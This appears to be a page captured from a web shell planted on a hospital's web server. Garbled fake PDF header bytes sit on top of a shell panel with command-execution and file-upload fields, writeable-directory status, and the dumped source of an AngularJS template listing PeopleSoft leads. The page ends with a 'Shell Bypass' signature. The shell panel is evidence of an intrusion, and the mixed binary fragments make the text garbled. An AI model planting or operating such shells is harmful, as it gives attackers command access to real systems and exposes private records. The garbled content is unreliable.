%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital.org/shardalms/lms/lms/views/leads/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital.org/shardalms/lms/lms/views/leads/ps_list.html
<div class="page-bar">
    <ul class="page-breadcrumb uc">
        <li><h2>PeopleSoft Leads</h2></li>
    </ul>
    <div class="page-toolbar">
    </div>
</div>
<!-- -->

<div class="">
    <!-- Search -->
    <div class="form-group">
        <a href="" class="btn btn-primary pull-right" ng-if="CR.sdata.from_db=='Lms'" ng-click="CR.add_to_oracle_db()" style="margin-left:5px"><i class="fa fa-plus"></i> Add To Oracle DB</a>
        <a href="" class="btn purple pull-right" ng-click="CR.exportLists()"><i class="fa fa-file-excel-o"></i> Export</a>
        <form ng-submit="CR.lists()">
            <div class="form-inline fc-sm">
                <input type="text" ng-model="CR.sdata.k" class="form-control w250" placeholder="EMPLID, PHONE, EMAIL, REF1_DESCR" />
                <input type="text" ng-model="CR.sdata.fromDate" class="form-control w130 cal hasCal" placeholder="From Date" />
                <input type="text" ng-model="CR.sdata.toDate" class="form-control w130 cal hasCal" placeholder="To Date" />
                <select class="form-control" ng-model="CR.sdata.from_db">
                    <option value="Lms">DB: Sharda LMS</option>
                    <option value="Oracle">DB: Oracle (PS)</option>
                </select>&nbsp;
                <button type="submit" class="btn btn-info">Search</button>
            </div>
        </form>
    </div>
    <!-- / -->

    <div ng-if="CR.result.length">
        <div class="text-secondary bold mb10">
            Showing {{CR.page.start+1}} - {{CR.page.start+CR.page.total}} of {{CR.page.total_records}} records.
        </div>
        <div class="sticky-tbl" style="max-height: 480px">
            <div class="pos-sticky-1px"></div>
            <table class="table table-striped table-bordered table-advance table-hover tablesm">
                <thead class="vmid">
                    <tr>
                        <th class1="w20">SN</th>
                        <th ng-repeat="(k,v) in CR.result[0]">{{k}}</th>
                        <th class1="w20"></th>
                    </tr>
                </thead>

                <tbody class="vtop">
                    <tr ng-repeat="(i,r) in CR.result">
                        <td>{{i+CR.page.start+1}}.</td>
                        
                        <td ng-repeat="(k,v) in r">
                            <span ng-if="k!=='EMPLOYEE_PHOTO'">{{v}}</span>
                            <!-- <span ng-if="k==='EMPLOYEE_PHOTO'">
                                <a href="{{apiUrl+'common/studentProfilePicFromBlob/'+r['EMPLID']}}" target="_blank">
                                    {{v}}
                                </a>
                            </span> -->
                        </td>
                        
                        <td class="text-center">
                            <div class="btn-group btn-group-solid">
                                <button type="button" class="btn btn-xs red" ng-click="CR.delete(r.EMPLID)" ng-disabled="!modules['ps_lead_delete']"><i class="fa fa-trash-o"></i></button>
                            </div>
                        </td>
                    </tr>
                </tbody>
            </table>
        </div>
        <div class="bold" ng-show="CR.page.total_pages>1">
            <div dir-paging fn="CR.lists" pageob="CR.page"></div>
        </div>
    </div>
    <div class="text-center text-default pd20" ng-if="!CR.result.length">No record found.</div>
</div>

Kontol Shell Bypass